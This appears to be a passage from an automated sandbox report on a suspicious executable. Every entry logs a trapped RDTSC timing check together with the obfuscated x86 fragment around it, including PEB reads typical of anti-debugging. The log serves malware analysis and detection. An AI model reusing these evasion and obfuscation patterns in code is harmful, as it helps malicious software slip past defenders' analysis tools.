Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160B337 second address: 160B343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007F27A8DEEC26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160B343 second address: 160B347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1610156 second address: 161015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161015C second address: 161016C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161EB68 second address: 161EB87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F27A8DEEC36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161EB87 second address: 161EB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161E76C second address: 161E772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161E772 second address: 161E78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D5h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161E78F second address: 161E7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F27A8DEEC36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E2E6C second address: 16E2E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E2E70 second address: 16E2E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E2E7B second address: 16E2EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F27A8DB97D8h 0x0000000c push ecx 0x0000000d jmp 00007F27A8DB97CEh 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E2FE2 second address: 16E2FEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E2FEC second address: 16E3003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F27A8DB97CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E3003 second address: 16E300F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F27A8DEEC26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E300F second address: 16E3031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F27A8DB97D5h 0x0000000c jnp 00007F27A8DB97C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E3031 second address: 16E3035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E3035 second address: 16E303B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E317F second address: 16E31AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007F27A8DEEC26h 0x0000000b pop edi 0x0000000c push eax 0x0000000d jmp 00007F27A8DEEC33h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jng 00007F27A8DEEC36h 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E3469 second address: 16E346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E346F second address: 16E3475 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E35DF second address: 16E363D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D8h 0x00000007 je 00007F27A8DB97C8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jp 00007F27A8DB97C6h 0x00000017 jmp 00007F27A8DB97D2h 0x0000001c jmp 00007F27A8DB97D6h 0x00000021 popad 0x00000022 pushad 0x00000023 js 00007F27A8DB97C6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E363D second address: 16E3657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F27A8DEEC31h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E37E8 second address: 16E3819 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F27A8DB97E9h 0x00000008 jmp 00007F27A8DB97D1h 0x0000000d jmp 00007F27A8DB97D2h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E3819 second address: 16E381D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E7E18 second address: 16E7E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E7E27 second address: 16E7E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E7EE0 second address: 16E7EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E81B8 second address: 16E81DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F27A8DEEC37h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E81DE second address: 16E81F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E9B52 second address: 16E9B7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jns 00007F27A8DEEC2Ah 0x00000012 push eax 0x00000013 js 00007F27A8DEEC26h 0x00000019 pop eax 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 push eax 0x00000021 pop eax 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E9B7D second address: 16E9B89 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007F27A8DB97C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E9B89 second address: 16E9B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007F27A8DEEC26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16E967F second address: 16E968A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50008 second address: 6F5000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5000C second address: 6F50012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50012 second address: 6F50018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50018 second address: 6F50044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F27A8DB97D7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50044 second address: 6F50062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27A8DEEC2Fh 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50062 second address: 6F50066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50066 second address: 6F5006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5006C second address: 6F50072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50072 second address: 6F500BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F27A8DEEC36h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov eax, 0E46001Dh 0x00000019 pushad 0x0000001a push esi 0x0000001b pop edx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F27A8DEEC2Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F500BD second address: 6F500C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F500C3 second address: 6F50105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007F27A8DEEC30h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov eax, 3B8791DDh 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F27A8DEEC30h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50105 second address: 6F5010B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5010B second address: 6F501D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 4CA62803h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F27A8DEEC30h 0x00000015 adc cx, 21C8h 0x0000001a jmp 00007F27A8DEEC2Bh 0x0000001f popfd 0x00000020 mov cx, DB3Fh 0x00000024 popad 0x00000025 mov ebx, dword ptr [eax+10h] 0x00000028 jmp 00007F27A8DEEC32h 0x0000002d xchg eax, esi 0x0000002e jmp 00007F27A8DEEC30h 0x00000033 push eax 0x00000034 jmp 00007F27A8DEEC2Bh 0x00000039 xchg eax, esi 0x0000003a jmp 00007F27A8DEEC36h 0x0000003f mov esi, dword ptr [762C06ECh] 0x00000045 jmp 00007F27A8DEEC30h 0x0000004a test esi, esi 0x0000004c pushad 0x0000004d jmp 00007F27A8DEEC2Eh 0x00000052 mov ch, C6h 0x00000054 popad 0x00000055 jne 00007F27A8DEFB6Fh 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F27A8DEEC38h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F503A3 second address: 6F503C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d mov eax, 4AC4A02Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 movzx eax, dx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F503C0 second address: 6F50415 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F27A8DEEC33h 0x00000008 sbb cx, B8CEh 0x0000000d jmp 00007F27A8DEEC39h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esi+08h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bh, B6h 0x0000001e jmp 00007F27A8DEEC34h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50415 second address: 6F50457 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007F27A8DB97D6h 0x00000011 mov eax, dword ptr [ebx+4Ch] 0x00000014 pushad 0x00000015 mov di, ax 0x00000018 mov bx, cx 0x0000001b popad 0x0000001c mov dword ptr [esi+10h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edi, 06829AB4h 0x00000027 mov ax, di 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50457 second address: 6F5046A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+50h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ch, bh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5046A second address: 6F504D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F27A8DB97CAh 0x00000009 sub cx, 9B98h 0x0000000e jmp 00007F27A8DB97CBh 0x00000013 popfd 0x00000014 jmp 00007F27A8DB97D8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+14h], eax 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F27A8DB97CEh 0x00000026 sbb ecx, 044C9D28h 0x0000002c jmp 00007F27A8DB97CBh 0x00000031 popfd 0x00000032 mov ebx, esi 0x00000034 popad 0x00000035 mov eax, dword ptr [ebx+54h] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov bl, FAh 0x0000003d mov bh, ah 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F504D7 second address: 6F50526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 push edi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+18h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F27A8DEEC30h 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007F27A8DEEC2Bh 0x0000001d sbb esi, 671BDC7Eh 0x00000023 jmp 00007F27A8DEEC39h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50526 second address: 6F5057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F27A8DB97D7h 0x00000009 sub cx, 0E8Eh 0x0000000e jmp 00007F27A8DB97D9h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+58h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F27A8DB97D3h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5057D second address: 6F50583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50583 second address: 6F505E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+1Ch], eax 0x0000000e jmp 00007F27A8DB97D6h 0x00000013 mov eax, dword ptr [ebx+5Ch] 0x00000016 jmp 00007F27A8DB97D0h 0x0000001b mov dword ptr [esi+20h], eax 0x0000001e pushad 0x0000001f push eax 0x00000020 call 00007F27A8DB97CDh 0x00000025 pop esi 0x00000026 pop edi 0x00000027 mov cx, 0A0Dh 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+60h] 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F505E1 second address: 6F50622 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 66h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+24h], eax 0x0000000a jmp 00007F27A8DEEC38h 0x0000000f mov eax, dword ptr [ebx+64h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F27A8DEEC38h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50622 second address: 6F50661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f pushfd 0x00000010 jmp 00007F27A8DB97D0h 0x00000015 and ch, 00000048h 0x00000018 jmp 00007F27A8DB97CBh 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+68h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50661 second address: 6F5067C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5067C second address: 6F506CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F27A8DB97CFh 0x00000009 sbb ax, 96EEh 0x0000000e jmp 00007F27A8DB97D9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+2Ch], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F27A8DB97CFh 0x00000022 pop eax 0x00000023 mov dx, E6ACh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F506CC second address: 6F506D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F506D2 second address: 6F50708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c jmp 00007F27A8DB97D8h 0x00000011 mov word ptr [esi+30h], ax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F27A8DB97CAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50708 second address: 6F50717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50717 second address: 6F5074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F27A8DB97CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5074A second address: 6F50802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d pushad 0x0000000e mov eax, 26B65283h 0x00000013 push ecx 0x00000014 pushfd 0x00000015 jmp 00007F27A8DEEC2Fh 0x0000001a jmp 00007F27A8DEEC33h 0x0000001f popfd 0x00000020 pop esi 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+0000008Ch] 0x00000028 jmp 00007F27A8DEEC2Fh 0x0000002d mov dword ptr [esi+34h], eax 0x00000030 pushad 0x00000031 call 00007F27A8DEEC34h 0x00000036 pushfd 0x00000037 jmp 00007F27A8DEEC32h 0x0000003c and cx, 1F08h 0x00000041 jmp 00007F27A8DEEC2Bh 0x00000046 popfd 0x00000047 pop ecx 0x00000048 movsx edx, ax 0x0000004b popad 0x0000004c mov eax, dword ptr [ebx+18h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F27A8DEEC37h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50802 second address: 6F5085D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F27A8DB97D3h 0x00000015 add eax, 2702FA0Eh 0x0000001b jmp 00007F27A8DB97D9h 0x00000020 popfd 0x00000021 movzx esi, bx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5085D second address: 6F5087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DEEC39h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5087A second address: 6F5089C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+1Ch] 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e mov esi, edi 0x00000010 popad 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F27A8DB97CCh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5089C second address: 6F508E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F27A8DEEC31h 0x00000009 or si, 8906h 0x0000000e jmp 00007F27A8DEEC31h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+20h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F27A8DEEC39h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F508E9 second address: 6F50927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c jmp 00007F27A8DB97CEh 0x00000011 lea eax, dword ptr [ebx+00000080h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F27A8DB97CDh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50927 second address: 6F5092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5092C second address: 6F5095D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F27A8DB97D0h 0x00000014 rdtsc
